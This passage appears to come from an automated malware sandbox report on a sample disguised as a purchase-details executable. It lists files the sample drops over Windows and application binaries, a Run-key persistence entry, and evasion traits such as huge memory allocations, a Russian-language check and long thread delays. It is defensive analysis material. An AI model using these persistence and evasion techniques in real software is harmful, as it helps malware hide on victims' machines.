                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops PE files to the user root directory
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SdvvfamyJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SdvvfamyJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files inside the volume driver (system volume information)
                  Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B2AB1C
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Allocates many large memory junks
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2B10000 memory commit 500006912Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2B11000 memory commit 500178944Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2B3D000 memory commit 500002816Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2B3E000 memory commit 500350976Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2B94000 memory commit 501014528Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2C8C000 memory commit 500006912Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeMemory allocated: 2C8E000 memory commit 500015104Jump to behavior
                  Contains functionality to behave differently if execute on a Russian/Kazak computer
                  Source: C:\Windows\System32\alg.exeCode function: 12_2_004A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_004A52A0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_00B852A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 24_2_004F52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_004F52A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 25_2_008952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 25_2_008952A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 26_2_00D252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 26_2_00D252A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 27_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_00CD52A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 28_2_007552A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_007552A0
                  Source: C:\Windows\System32\Locator.exeCode function: 30_2_005452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 30_2_005452A0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 31_2_007352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 31_2_007352A0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMemory allocated: 26C50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMemory allocated: 26E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMemory allocated: 28E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_1_004019F0
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifWindow / User API: threadDelayed 7315Jump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifWindow / User API: threadDelayed 2503Jump to behavior
                  Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 491
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
